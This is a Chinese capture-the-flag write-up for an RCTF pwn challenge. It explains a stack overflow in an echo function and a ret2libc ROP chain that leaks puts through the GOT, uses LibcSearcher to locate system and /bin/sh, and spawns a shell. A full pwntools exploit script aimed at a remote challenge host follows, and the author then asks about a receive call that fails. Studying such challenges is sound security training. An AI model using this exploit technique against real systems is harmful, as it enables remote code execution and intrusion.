checksec查看
ida
main函数
点开echo函数
可以看到此处有一个模拟字符串复制函数,并未检查缓冲群长度,存在溢出漏洞
分析
初始的想法是利用上述漏洞,构造exp,用puts函数泄露got,但是函数当中,遇到字符\x00便会停止复制,地址当中也肯定会有\x00,所以只能注入一个返回地址。
那么我们注入什么地址呢,首先观察此时栈结构
若返回地址代码能连续pop四次的话,刚好能达到截断后的数据
那么构造如下payload:b’a’*16+b’a’*8+pop_4+pop_rdi+puts_got+put_plt+main_addr
被截断后在栈中的结构如下
连续pop可使ip指向自己构造的ROP链条
ROPgadget一下,发现0x40089c挺适合作为pop_4
p.recvuntil('RCTF\n')
payload=b'a'*0x18+p64(pop_4)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)
发送之后,由于printf遇到\x00才会停止输出,就会收到’a’*ox18,以及pop_4末三位非零地址形成的字符
在此之后,则会收到puts泄露的got表
p.recvuntil(b'a'*0x18)
p.recv(3)
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
有了got表中地址,就可以利用LibcSearcher找到system与/bin/sh的地址
libc = LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
进入main函数,再一次利用上述漏洞,即可成功
payload=b'a'*0x18+p64(0x40089c)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()
exp
from pwn import *
from LibcSearcher import *
pwn=ELF('./pwn')
p=remote('61.147.171.105',63314)
puts_got=pwn.got['puts']
puts_plt=pwn.plt['puts']
pop_rdi=0x4008a3
pop_4=0x40089c
main_addr=0x4007cd
p.recvuntil('RCTF\n')
payload=b'a'*0x18+p64(pop_4)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)
p.recvuntil(b'a'*0x18)
p.recv(3)
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump('puts')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload=b'a'*0x18+p64(0x40089c)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()
我有一点奇怪的地方,第一次利用漏洞之后,返回主函数,那应该会有write(1, “Welcome to RCTF\n”, 0x10uLL);语句,但是我无论在LibcSearcher部分的前面还是后面加上p.recvuntil(‘RCTF\n’)语句,都无法运行成功,把这句话去掉就能运行成功。返回主函数后,不应该会打印这句话吗,为什么接收不到呢